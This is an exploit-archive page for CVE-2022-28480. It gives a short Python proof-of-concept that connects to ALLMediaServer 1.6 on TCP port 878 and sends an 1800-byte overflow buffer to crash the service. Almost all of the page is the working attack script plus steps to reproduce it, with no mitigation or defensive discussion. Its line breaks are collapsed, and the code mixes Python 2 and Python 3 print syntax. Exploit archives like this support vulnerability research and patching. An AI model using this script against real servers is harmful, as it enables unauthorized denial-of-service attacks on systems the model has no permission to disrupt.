CVE-2022-28480: ALLMediaServer 1.6 Remote Buffer Overflow ≈ Packet Storm

# Exploit Title: ALLMediaServer 1.6 Remote Buffer Overflow# Discovered by: Yehia Elghaly# Discovered Date: 2022-03-25# Vendor Homepage: https://www.allmediaserver.org/# Software Link : https://www.allmediaserver.org/LiveUpdate/ALLMediaServer.exe# Tested Version: 1.6# Vulnerability Type:  Buffer Overflow (DoS) Remote# Tested on OS: Windows 7 x86 - Windows 10 x64# Description: ALLMediaServer 1.6 Remote Buffer Overflow# Steps to reproduce:# 1. - ALLMediaServer 1.6 listening on port 888 or can be changed to 878# 2. - Run the Script from remote TCP/IP# 3. - Mediaserver.exe Crashedimport socketprint("######################################################")print("# ALLMediaServer 1.6 Remote (BUffer Overflow)        #")print("#             --------------------------           #")print("#               BY  Yehia Elghaly                    #")print("######################################################")s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)try:  s.connect(('192.168.1.99', 878))  evilbuffer = "A" *1800  s.sendall(evilbuffer)  data = s.recv(1024)  s.close()  print "Media is Out"except socket.error, msg:  print ""  print "Couldnt connect with Mediaserver - Crashed"